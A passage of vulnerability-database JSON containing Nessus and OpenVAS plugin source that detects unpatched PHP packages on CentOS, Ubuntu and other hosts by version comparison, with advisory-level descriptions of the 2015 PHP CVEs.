"p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-cli", "p-cpe:/a:centos:centos:php-common", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-pspell", "p-cpe:/a:centos:centos:php-tidy", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-soap", "p-cpe:/a:centos:centos:php-dba", "p-cpe:/a:centos:centos:php-process", "p-cpe:/a:centos:centos:php-xmlrpc", "p-cpe:/a:centos:centos:php-embedded"], "id": "CENTOS_RHSA-2015-1218.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84648", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1218 and \n# CentOS Errata and Security Advisory 2015:1218 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84648);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2014-9425\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-2301\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3307\", \"CVE-2015-3329\", \"CVE-2015-3411\", \"CVE-2015-3412\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4026\", \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4598\", \"CVE-2015-4599\", \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\", \"CVE-2015-4603\", \"CVE-2015-4643\");\n script_bugtraq_id(71800, 72541, 72701, 73031, 73037, 73306, 73357, 73431, 74239, 74240, 74413, 74700, 74703, 74902, 74903, 75056, 75103, 75244, 75246, 75249, 75250, 75251, 75252, 75255);\n script_xref(name:\"RHSA\", value:\"2015:1218\");\n\n script_name(english:\"CentOS 6 : php (CESA-2015:1218)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount\nof CPU time. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application\nusing the exif_read_data() function to crash or, possibly, execute\narbitrary code with the privileges of the user running that PHP\napplication. (CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was\nfound in the way PHP's FTP extension parsed file listing FTP server\nresponses. A malicious FTP server could use this flaw to cause a PHP\napplication to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the\nunserialize() function could cause a PHP application to crash or,\npossibly, execute arbitrary code. (CVE-2015-0273, CVE-2015-2787,\nCVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension\nparsed Phar archives. A specially crafted archive could cause PHP to\ncrash or, possibly, execute arbitrary code when opened.\n(CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329,\nCVE-2015-4021)\n\nA heap buffer overflow flaw was found in the\nenchant_broker_request_dict() function of PHP's enchant extension. An\nattacker able to make a PHP application enchant dictionaries could\npossibly cause it to crash. (CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application\nusing the imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy()\nfunction in the PHP ZTS module. This flaw could possibly cause a PHP\napplication to crash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-July/021237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ed61604\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-bcmath-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-cli-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-common-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-dba-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-devel-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-embedded-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-enchant-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-fpm-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-gd-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-imap-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-intl-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-ldap-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-mbstring-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-mysql-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-odbc-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-pdo-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-pgsql-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-process-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-pspell-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-recode-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-snmp-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-soap-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-tidy-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-xml-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-xmlrpc-5.3.3-46.el6_6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"php-zts-5.3.3-46.el6_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-20T16:09:51", "references": ["http://php.net/ChangeLog-5.php", "https://bugs.php.net/bug.php?id=69085", "http://openwall.com/lists/oss-security/2015/06/01/4"], "pluginID": "1361412562310805651", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-16T00:00:00", "title": "PHP Multiple Vulnerabilities - 01 - Jun15 (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2331", "CVE-2015-4148", "CVE-2015-4147"], "modified": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310805651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln01_june15_lin.nasl 2015-06-16 18:45:49 July$\n#\n# PHP Multiple Vulnerabilities - 01 - Jun15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805651\");\n script_version(\"$Revision: 11452 $\");\n script_cve_id(\"CVE-2015-4148\", \"CVE-2015-4147\", \"CVE-2015-2787\", \"CVE-2015-2348\",\n \"CVE-2015-2331\");\n script_bugtraq_id(73357, 73431, 73434);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-18 13:24:16 +0200 (Tue, 18 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-16 18:45:49 +0530 (Tue, 16 Jun 2015)\");\n script_name(\"PHP Multiple Vulnerabilities - 01 - Jun15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - 'do_soap_call' function in ext/soap/soap.c script in PHP does not verify\n that the uri property is a string.\n\n - 'SoapClient::__call' method in ext/soap/soap.c script in PHP does not verify\n that __default_headers is an array.\n\n - use-after-free error related to the 'unserialize' function when using\n DateInterval input.\n\n - a flaw in the 'move_uploaded_file' function that is triggered when handling\n NULL bytes.\n\n - an integer overflow condition in the '_zip_cdir_new' function in\n 'zip_dirent.c' script.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to obtain sensitive information by providing crafted\n serialized data with an int data type and to execute arbitrary code by\n providing crafted serialized data with an unexpected data type.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.39, 5.5.x before\n 5.5.23, and 5.6.x before 5.6.7\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP 5.4.39 or 5.5.23 or 5.6.7 or\n later. For updates refer to http://www.php.net\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=69085\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2015/06/01/4\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.22\"))\n {\n fix = \"5.5.23\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.6\"))\n {\n fix = \"5.6.7\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.4\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.4.39\"))\n {\n fix = \"5.4.39\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = 'Installed Version: ' + phpVer + '\\n' +\n 'Fixed Version: ' + fix + '\\n';\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-20T16:09:43", "references": ["http://php.net/ChangeLog-5.php", "https://bugs.php.net/bug.php?id=69085", "http://openwall.com/lists/oss-security/2015/06/01/4"], "pluginID": "1361412562310805650", "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "edition": 7, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-16T00:00:00", "title": "PHP Multiple Vulnerabilities - 01 - Jun15 (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2331", "CVE-2015-4148", "CVE-2015-4147"], "modified": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310805650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805650", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_mult_vuln01_june15_win.nasl 2015-06-16 18:45:49 July$\n#\n# PHP Multiple Vulnerabilities - 01 - Jun15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805650\");\n script_version(\"$Revision: 11452 $\");\n script_cve_id(\"CVE-2015-4148\", \"CVE-2015-4147\", \"CVE-2015-2787\", \"CVE-2015-2348\",\n \"CVE-2015-2331\");\n script_bugtraq_id(73357, 73431, 73434);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-18 13:24:16 +0200 (Tue, 18 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-16 18:45:49 +0530 (Tue, 16 Jun 2015)\");\n script_name(\"PHP Multiple Vulnerabilities - 01 - Jun15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - 'do_soap_call' function in ext/soap/soap.c script in PHP does not verify\n that the uri property is a string.\n\n - 'SoapClient::__call' method in ext/soap/soap.c script in PHP does not verify\n that __default_headers is an array.\n\n - use-after-free error related to the 'unserialize' function when using\n DateInterval input.\n\n - a flaw in the 'move_uploaded_file' function that is triggered when handling\n NULL bytes.\n\n - an integer overflow condition in the '_zip_cdir_new' function in\n 'zip_dirent.c' script.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to obtain sensitive information by providing crafted\n serialized data with an int data type and to execute arbitrary code by\n providing crafted serialized data with an unexpected data type.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.39, 5.5.x before\n 5.5.23, and 5.6.x before 5.6.7\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP 5.4.39 or 5.5.23 or 5.6.7 or\n later. For updates refer to http://www.php.net\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=69085\");\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2015/06/01/4\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(phpVer =~ \"^5\\.5\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.5.0\", test_version2:\"5.5.22\"))\n {\n fix = \"5.5.23\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.6\")\n{\n if(version_in_range(version:phpVer, test_version:\"5.6.0\", test_version2:\"5.6.6\"))\n {\n fix = \"5.6.7\";\n VULN = TRUE;\n }\n}\n\nif(phpVer =~ \"^5\\.4\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.4.39\"))\n {\n fix = \"5.4.39\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = 'Installed Version: ' + phpVer + '\\n' +\n 'Fixed Version: ' + fix + '\\n';\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:10", "references": ["2572-1", "http://www.ubuntu.com/usn/usn-2572-1/"], "pluginID": "1361412562310842171", "description": "Check the version of php5", "edition": 8, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-04-21T00:00:00", "title": "Ubuntu Update for php5 USN-2572-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2305"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:1361412562310842171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842171", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for php5 USN-2572-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842171\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-21 07:19:00 +0200 (Tue, 21 Apr 2015)\");\n script_cve_id(\"CVE-2015-3330\", \"CVE-2015-3329\", \"CVE-2015-2305\", \"CVE-2015-2348\",\n \"CVE-2015-2783\", \"CVE-2015-2787\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for php5 USN-2572-1\");\n script_tag(name:\"summary\", value:\"Check the version of php5\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that PHP incorrectly\nhandled cleanup when used with Apache 2.4. A remote attacker could use this\nissue to cause PHP to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. (CVE-2015-3330)\n\nIt was discovered that PHP incorrectly handled opening tar, zip or phar\narchives through the PHAR extension. A remote attacker could use this issue\nto cause PHP to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. (CVE-2015-3329)\n\nIt was discovered that PHP incorrectly handled regular expressions. A\nremote attacker could use this issue to cause PHP to crash, resulting in a\ndenial of service, or possibly execute arbitrary code. (CVE-2015-2305)\n\nPaulos Yibelo discovered that PHP incorrectly handled moving files when a\npathname contained a null character. A remote attacker could use this issue\nto possibly bypass filename restrictions. This issue only applied to\nUbuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-2348)\n\nIt was discovered that PHP incorrectly handled unserializing PHAR files. A\nremote attacker could use this issue to cause PHP to possibly expose\nsensitive information. (CVE-2015-2783)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing certain\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-2787)\");\n script_tag(name:\"affected\", value:\"php5 on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2572-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2572-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS|10\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.12+dfsg-2ubuntu4.4\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.5.12+dfsg-2ubuntu4.4\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.12+dfsg-2ubuntu4.4\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.12+dfsg-2ubuntu4.4\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.9+dfsg-1ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", 